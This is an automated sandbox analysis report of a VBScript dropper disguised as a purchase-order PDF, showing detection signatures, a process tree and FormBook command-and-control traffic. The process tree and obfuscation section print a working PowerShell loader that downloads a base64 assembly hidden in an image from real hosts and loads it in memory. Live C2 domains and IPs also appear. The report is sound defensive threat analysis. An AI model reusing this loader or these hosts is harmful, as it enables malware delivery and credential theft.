Windows Analysis Report
PO-DC13112024_pdf.vbs

Overview

General Information

Sample name: PO-DC13112024_pdf.vbs
Analysis ID: 1555634
MD5: 07213aa47f52b96d0e8aa463a384bcf9
SHA1: d14f3d9f87a233f21a6d3e9a4cffeaba0bef144b
SHA256: 069cf757c1829b0ceb918585fca5765b259546b12eb729b1d44b956effa3f290
Tags: vbs, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3676 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[encoded string removed]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 1220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • WKOyCvoOlM.exe (PID: 6008 cmdline: "C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • where.exe (PID: 4696 cmdline: "C:\Windows\SysWOW64\where.exe" MD5: 5630411B5F4F453CA575248F7AD4C89F)
              • WKOyCvoOlM.exe (PID: 3720 cmdline: "C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 5380 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 1276 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 1276 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 3292 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 3292 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Source | Rule | Description | Author | Strings
amsi64_3292.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

        Spreading

        Source: Process started | Author: Joe Security | Data: Command: command line of powershell.exe (PID: 3292), as listed in the process tree above

        System Summary

        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: command line of powershell.exe (PID: 1276), as listed in the process tree above
        Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: command line of powershell.exe (PID: 3292), as listed in the process tree above
        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: command line of powershell.exe (PID: 1276), as listed in the process tree above
        Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", ProcessId: 3676, ProcessName: wscript.exe
        Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: command line of powershell.exe (PID: 3292), as listed in the process tree above
        Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-DC13112024_pdf.vbs", ProcessId: 3676, ProcessName: wscript.exe
        Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: command line of powershell.exe (PID: 1276), as listed in the process tree above

        Data Obfuscation

        Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-11-14T08:15:50.576994+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.5 | 49732 | TCP
        2024-11-14T08:16:13.926913+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 63373 | TCP
        2024-11-14T08:16:15.332037+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.5 | 63381 | TCP
        2024-11-14T08:15:37.553182+0100 | 2047750 | 1 | A Network Trojan was detected | 103.20.102.62 | 80 | 192.168.2.5 | 49704 | TCP
        2024-11-14T08:16:22.358617+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 63422 | 199.59.243.227 | 80 | TCP
        2024-11-14T08:16:54.529953+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 63490 | 156.232.181.155 | 80 | TCP
        2024-11-14T08:17:09.686592+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 63494 | 101.35.209.183 | 80 | TCP
        2024-11-14T08:17:24.177140+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 63498 | 203.161.46.205 | 80 | TCP
        2024-11-14T08:17:37.893093+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 63502 | 161.97.142.144 | 80 | TCP
        2024-11-14T08:15:37.556209+0100 | 2049038 | 1 | A Network Trojan was detected | 103.20.102.62 | 80 | 192.168.2.5 | 49704 | TCP
        2024-11-14T08:16:22.358617+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 63422 | 199.59.243.227 | 80 | TCP
        2024-11-14T08:16:54.529953+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 63490 | 156.232.181.155 | 80 | TCP
        2024-11-14T08:17:09.686592+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 63494 | 101.35.209.183 | 80 | TCP
        2024-11-14T08:17:24.177140+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 63498 | 203.161.46.205 | 80 | TCP
        2024-11-14T08:17:37.893093+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 63502 | 161.97.142.144 | 80 | TCP
        2024-11-14T08:16:47.405053+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63487 | 156.232.181.155 | 80 | TCP
        2024-11-14T08:16:49.952180+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63488 | 156.232.181.155 | 80 | TCP
        2024-11-14T08:16:52.498929+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63489 | 156.232.181.155 | 80 | TCP
        2024-11-14T08:17:02.561483+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63491 | 101.35.209.183 | 80 | TCP
        2024-11-14T08:17:04.592653+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63492 | 101.35.209.183 | 80 | TCP
        2024-11-14T08:17:07.373936+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63493 | 101.35.209.183 | 80 | TCP
        2024-11-14T08:17:16.548482+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63495 | 203.161.46.205 | 80 | TCP
        2024-11-14T08:17:19.096313+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63496 | 203.161.46.205 | 80 | TCP
        2024-11-14T08:17:21.645493+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63497 | 203.161.46.205 | 80 | TCP
        2024-11-14T08:17:30.229642+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63499 | 161.97.142.144 | 80 | TCP
        2024-11-14T08:17:32.780060+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63500 | 161.97.142.144 | 80 | TCP
        2024-11-14T08:17:35.345872+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63501 | 161.97.142.144 | 80 | TCP
        2024-11-14T08:17:45.124379+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 63503 | 43.155.76.124 | 80 | TCP
        2024-11-14T08:15:41.182915+0100 | 2858295 | 1 | A Network Trojan was detected | 185.199.111.133 | 443 | 192.168.2.5 | 49705 | TCP


        AV Detection

        Source: PO-DC13112024_pdf.vbs, Virustotal: Detection: 9%
        Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
        Source: unknown, HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Binary string: where.pdbGCTL source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: where.pdb source: RegAsm.exe, 00000005.00000002.2489670846.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000003.2662569377.0000000000ECB000.00000004.00000001.00020000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3403960085.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WKOyCvoOlM.exe, 00000007.00000002.3403075765.00000000000BE000.00000002.00000001.01000000.00000007.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3403074648.00000000000BE000.00000002.00000001.01000000.00000007.sdmp
        Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, where.exe, where.exe, 00000008.00000002.3405002223.0000000004940000.00000040.00001000.00020000.00000000.sdmp, where.exe, 00000008.00000003.2483618951.000000000479A000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000003.2480888142.00000000045E9000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405002223.0000000004ADE000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: RegAsm.pdb4 source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000004F6C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559847193.00000000029CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B3BC000.00000004.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244534059.00000127CEBE0000.00000004.08000000.00040000.00000000.sdmp
        Source: C:\Windows\SysWOW64\where.exe, Code function: 8_2_0079C990 FindFirstFileW,FindNextFileW,FindClose,8_2_0079C990

        Software Vulnerabilities

        Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        Source: C:\Windows\SysWOW64\where.exe, Code function: 4x nop then xor eax, eax 8_2_00789EB0
        Source: C:\Windows\SysWOW64\where.exe, Code function: 4x nop then mov ebx, 00000004h 8_2_047904E8
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe, Code function: 4x nop then xor eax, eax 10_2_04E70EFE

        Networking

        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63422 -> 199.59.243.227:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63422 -> 199.59.243.227:80
        Source: Network traffic, Suricata IDS: 2047750 - Severity 1 - ET MALWARE Base64 Encoded MZ In Image : 103.20.102.62:80 -> 192.168.2.5:49704
        Source: Network traffic, Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 103.20.102.62:80 -> 192.168.2.5:49704
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63496 -> 203.161.46.205:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63499 -> 161.97.142.144:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63502 -> 161.97.142.144:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63491 -> 101.35.209.183:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63495 -> 203.161.46.205:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63490 -> 156.232.181.155:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63490 -> 156.232.181.155:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63489 -> 156.232.181.155:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63502 -> 161.97.142.144:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63493 -> 101.35.209.183:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63497 -> 203.161.46.205:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63503 -> 43.155.76.124:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63487 -> 156.232.181.155:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63492 -> 101.35.209.183:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63488 -> 156.232.181.155:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63500 -> 161.97.142.144:80
        Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63501 -> 161.97.142.144:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63498 -> 203.161.46.205:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63498 -> 203.161.46.205:80
        Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:63494 -> 101.35.209.183:80
        Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63494 -> 101.35.209.183:80
        Source: Network traffic, Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 185.199.111.133:443 -> 192.168.2.5:49705
        Source: DNS query: www.030002350.xyz
        Source: global traffic, HTTP traffic detected: GET /richie213/ani/refs/heads/main/jdikobc.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
        Source: global traffic, HTTP traffic detected: GET /new_img.jpg HTTP/1.1 Host: 103.20.102.62 Connection: Keep-Alive
        Source: Joe Sandbox View, IP Address: 161.97.142.144
        Source: Joe Sandbox View, IP Address: 199.59.243.227
        Source: Joe Sandbox View, ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
        Source: Joe Sandbox View, ASN Name: CONTABODE
        Source: Joe Sandbox View, ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
        Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49732
        Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:63373
        Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:63381
        Source: unknown, TCP traffic detected without corresponding DNS query: 103.20.102.62
        Source: global traffic, HTTP traffic detected: GET /f3nk/?X8wps=HD9ptle8L&qb6h=v6+LTBEbPC2R85sFOmmbFC2Q/XGqyVy+lLBawY5mHj8QlUcwrm67JADjHek/seltQEUToGC/qYQit/V96/0oCLxc35by5p8gg2oFcQQLjMbf4RKBZtC51re3Q6vWyy22Hg== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.bcg.services Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: GET /c6yl/?qb6h=QAykvSbKcm9a/Zd756st6oc0c2ndg18QAahNUeLfrY6eiOHcgN8hz9hRbXFDsZyrs9wVKyWLGfVe8RlZjLvC3xYEXrLC/N5rcVQ70kVg4GEX58Hw+NfPJKYlgF2/w0JeMA==&X8wps=HD9ptle8L HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.5tuohbpzyj9.buzz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: GET /grmn/?qb6h=GvVCyhHHBwWm3Wiqs6T1+HSOrEGLSLVs90U44aOn+V5a+alxbue2HRsnEZvT1CUlYqTASXI2DXs3J4l64Md/MUcibXuAbURyjOW4TtuxIV2IutBvJyuUjqtFtGqljQIKAQ==&X8wps=HD9ptle8L HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.yc791022.asia Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: GET /gdpp/?X8wps=HD9ptle8L&qb6h=XNlLlzJ611biWBDnQnCeFZ6NVZ4xLjWXfr+0L15v/dkoQ7LxqA4db7MsNS0iTnnZ4s3kssINbHg5oGi7TlfLVlZQ57t8NMxb4MyHODvld5yYZYMDALlCTAgJ47pyJF8rKg== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.nimil.info Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global traffic, HTTP traffic detected: GET /wrcq/?qb6h=0aBKMIuxMWsDZlZuGCNWGAisa+F3tvB0xMbS2kgCUdLh7rFDbnNAXehk8UbfWJO3lEanFmC09f09BQpsWN4gqHRUU5ElviQXwZTk2Xd/dFN8TxdFGzfCv1WAKHEC3ArfOQ==&X8wps=HD9ptle8L HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.030002350.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
        Source: global traffic, DNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global traffic, DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
        Source: global traffic, DNS traffic detected: DNS query: www.bcg.services
        Source: global traffic, DNS traffic detected: DNS query: www.alihones.lol
        Source: global traffic, DNS traffic detected: DNS query: www.5tuohbpzyj9.buzz
        Source: global traffic, DNS traffic detected: DNS query: www.yc791022.asia
        Source: global traffic, DNS traffic detected: DNS query: www.nimil.info
        Source: global traffic, DNS traffic detected: DNS query: www.030002350.xyz
        Source: global traffic, DNS traffic detected: DNS query: www.nuy25c9t.sbs
